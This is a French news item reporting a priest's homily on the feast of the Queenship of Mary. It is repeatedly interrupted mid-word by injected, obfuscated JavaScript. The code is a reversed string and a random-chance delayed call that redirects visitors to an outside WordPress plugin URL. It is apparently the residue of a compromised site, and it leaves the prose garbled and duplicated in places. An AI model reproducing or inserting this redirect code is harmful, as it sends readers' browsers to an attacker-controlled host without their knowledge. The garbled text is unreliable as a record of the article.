En ce 22 août 2019 soit exactement une semaine après la fête de l´Assomption, l´église catholique célèbre la fête de la Vierge Marie, Reine. Dans son homélie, le Père Longin NTIRANYIBAGIRA, du Mouvement Apostolique de Schoenstatt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont la devise est dédiée à la Sainte Vierge et dit « Rien sans vous. Rien sans nous», est revenu sur la fête de l´Assomption qui était basée sur les quatrième et cinquième Mystères Glorieux.

Le 15 août passé, nous avons célébré la montée au ciel de la Vierge Marie de façon particulière au quatrième Mystère Glorieux. Aujourd´hui, nous célébrons le cinquième, le couronnement de Marie au Ciel comme le décrit ce premier verset de l’Apocalypse en son chapitre 12 « Un signe grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andiose apparut dans le ciel : une Femme, ayant le soleil pour manteau, la lune sous les pieds, et sur la tête une couronne de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}douze étoiles. »

Célébrons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc cette sainte fête de notre auguste Reine, a-t-il poursuivi, en méditant sur cette honneur qu´elle a reçue d´être couronnée comme Reine tout en pensant à notre couronnement aussi le moment venu.

Les premiers chrétiens ont vite compris la place de la Vierge Marie comme Reine et se sont demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andés comment est-ce qu´ils pouvaient la couronner.  Après maintes réflexions, ils ont choix le Rosaire et les prières mariales.

Réciter le chapelet, martèle le prédicateur, c´est offrir des fleurs à la Vierge Marie. Nous pouvons couronner notre Mère Céleste, Reine des Cieux, en récitant le Rosaire. Nous couronnons aussi notre Mère par nos bonnes œuvres et nos prières.

Nous avons reçu tous notre couronne le jour de notre baptême, rappelle le Père Longin, nous devons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc bien la conserver et l´entretenir jusqu´à la fin de notre vie sur terre. Le linge blanc que le prêtre pose sur notre tête le jour de baptême est signe de sainteté et pureté que nous devons toujours garder soigneusement.

En la Vierge Marie, tous nos problèmes quotidiens trouvent des solutions, a-t-il conclu.

GERMAIN NAHIMANA

Laisser un commentaire